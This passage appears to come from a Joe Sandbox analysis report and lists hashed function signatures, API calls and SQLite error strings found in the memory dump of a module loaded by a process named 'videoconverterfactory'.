                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_value_text
                                                                                                      • String ID: (NULL)$NULL
                                                                                                      • API String ID: 2175239460-873412390
                                                                                                      • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                      • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                                      • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                                      • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: -- $d
                                                                                                      • API String ID: 632333372-777087308
                                                                                                      • Opcode ID: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                      • Instruction ID: d45f625f7ed72e8bd0cbe86fb5af212c953cff4c7e5ffbb26f6c4a79540968e1
                                                                                                      • Opcode Fuzzy Hash: 2197877c990d2cc598be623123ad695ba2ed3a88a0fc98749b4c643aad0a3996
                                                                                                      • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: string or blob too big$|
                                                                                                      • API String ID: 632333372-330586046
                                                                                                      • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                      • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                                      • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                                      • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: d$|
                                                                                                      • API String ID: 632333372-415524447
                                                                                                      • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                      • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                                      • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                                      • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_logsqlite3_value_text
                                                                                                      • String ID: string or blob too big
                                                                                                      • API String ID: 2320820228-2803948771
                                                                                                      • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                      • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                                      • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                                      • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                                      APIs
                                                                                                      • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                                      • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                      • String ID:
                                                                                                      • API String ID: 3265351223-3916222277
                                                                                                      • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                      • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                                      • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                                      • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_stricmp
                                                                                                      • String ID: log
                                                                                                      • API String ID: 912767213-2403297477
                                                                                                      • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                      • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                                      • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                                      • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_strnicmp
                                                                                                      • String ID: SQLITE_
                                                                                                      • API String ID: 1961171630-787686576
                                                                                                      • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                      • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                                      • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                                      • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                                      APIs
                                                                                                      • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                      • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                      Strings
                                                                                                      • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID: Invalid argument to rtreedepth()
                                                                                                      • API String ID: 1063208240-2843521569
                                                                                                      • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                      • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                      • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                      • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                      APIs
                                                                                                      • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                        • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                        • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                        • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                        • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                      • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID: soft_heap_limit
                                                                                                      • API String ID: 1251656441-405162809
                                                                                                      • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                      • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                                      • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                      • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                      APIs
                                                                                                      • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                      • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: NULL
                                                                                                      • API String ID: 632333372-324932091
                                                                                                      • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                      • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                      • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                      • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeavefree
                                                                                                      • String ID:
                                                                                                      • API String ID: 4020351045-0
                                                                                                      • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                      • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                                                      • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                                                      • Instruction Fuzzy Hash: 2D018070B293058BDB10DF28C985919BBFBABB6308B20855CE499D7355D770DC80EB62
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 682475483-0
                                                                                                      • Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                      • Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
                                                                                                      • Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
                                                                                                      • Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2